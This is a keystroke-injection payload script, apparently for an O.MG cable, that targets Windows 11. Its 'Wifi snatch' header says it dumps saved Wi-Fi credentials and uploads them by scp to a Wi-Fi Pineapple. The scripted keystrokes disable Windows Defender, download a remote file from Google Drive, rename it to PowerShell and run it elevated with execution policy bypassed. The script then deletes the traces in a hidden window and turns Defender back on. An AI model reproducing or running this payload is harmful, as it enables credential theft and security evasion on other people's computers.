REM --------------------------------------------------Payload-------------------------------------------------------
REM Wifi snatch
REM OMG script using hotkeys and run commands to kill windows defender, dump wifi and upload to wifi pager thru scp
REM Windows 11
REM f3bandit
REM ----------------------------------------------------------------------------------------------------------------
DELAY 1000
windows r
DELAY 1000
STRINGLN windowsdefender:
DELAY 1000
ENTER
TAB
DELAY 200
TAB
DELAY 200
TAB
DELAY 200
TAB
DELAY 200
ENTER
DELAY 200
SPACE
DELAY 200
TAB
DELAY 200
TAB
DELAY 200
TAB
DELAY 200
TAB
DELAY 200
TAB
DELAY 200
TAB
DELAY 200
SPACE
DELAY 200
ALT F4
DELAY 1000
windows r
DELAY 1000
STRINGLN powershell -NoProfile -ExecutionPolicy Bypass -Command "New-Item -ItemType Directory -Path \"$env:TEMP\wifi\" -Force | Out-Null; curl \"https://drive.google.com/uc?export=download&id=1tIiD-<INSERT DL ID HERE>\" -o \"$env:TEMP\wifi\magic.txt\""
DELAY 1000
windows r
DELAY 1000
STRINGLN cmd /c "if exist %TEMP%\wifi\magic.txt rename %TEMP%\wifi\magic.txt magic.ps1"
DELAY 1000
windows r
DELAY 1000
STRINGLN powershell -Command "Start-Process powershell -Verb RunAs -ArgumentList '-NoP -ExecutionPolicy Bypass -Command & \"%TEMP%\wifi\magic.ps1\"'"
DELAY 1000
windows r
DELAY 1000
STRINGLN powershell -Command "Start-Process powershell -Verb RunAs -WindowStyle Hidden -ArgumentList '-NoP -NonI -Command Remove-Item -Path \"$env:TEMP\wifi\" -Recurse -Force'"
DELAY 1000
windows r
DELAY 1000
STRINGLN windowsdefender:
DELAY 1000
TAB
DELAY 200
SPACE
DELAY 200
ALT F4
windows r
DELAY 1000
STRINGLN windowsdefender:
DELAY 1000
TAB
DELAY 200
SPACE
DELAY 200
ALT F4
